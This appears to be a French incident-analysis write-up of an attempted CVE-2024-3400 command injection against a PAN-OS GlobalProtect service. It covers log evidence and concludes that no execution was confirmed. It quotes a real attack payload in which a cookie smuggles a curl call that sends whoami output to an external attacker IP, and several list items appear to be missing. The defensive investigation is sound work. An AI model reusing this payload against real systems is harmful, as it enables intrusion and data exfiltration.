
Investigation d'une tentative d'injection de commande PAN-OS CVE-2024-3400, analysant la livraison de la charge utile, le traitement interne et la validation de l'exécution basée sur des preuves de logs.
Ce projet documente l’enquête sur une tentative d’injection de commande CVE-2024-3400 ciblant un service PAN-OS GlobalProtect.
L’objectif était de déterminer :
Une alerte critique a été déclenchée indiquant une tentative d’exploitation possible.

La requête contient un cookie conçu :
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} contourne le filtrage des espaceswhoami tente de récupérer l’identité du systèmecurl tente une communication sortanteIl s’agit d’une charge utile d’injection de commande
Les journaux Nginx confirment que la requête a atteint le serveur :
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

La requête malveillante a été acceptée et traitée.
Les journaux système montrent que la charge utile a atteint la logique interne :

dt_curl)Cependant :
La résolution DNS a échoué → la requête sortante a échoué
L’IP attaquante :

Cela confirme une origine externe de l’attaquant.
Plusieurs IP ont interagi avec le système avant l’attaque :

Seule 144.172.79.92 est directement liée à l’exploitation.
Il s’agissait d’une véritable tentative d’injection de commande.
L’attaquant a réussi à :
Cependant :
il n’y a aucune exécution ou compromission système confirmée
Tentative d’injection de commande
Charge utile traitée - Aucune exécution ou impact confirmé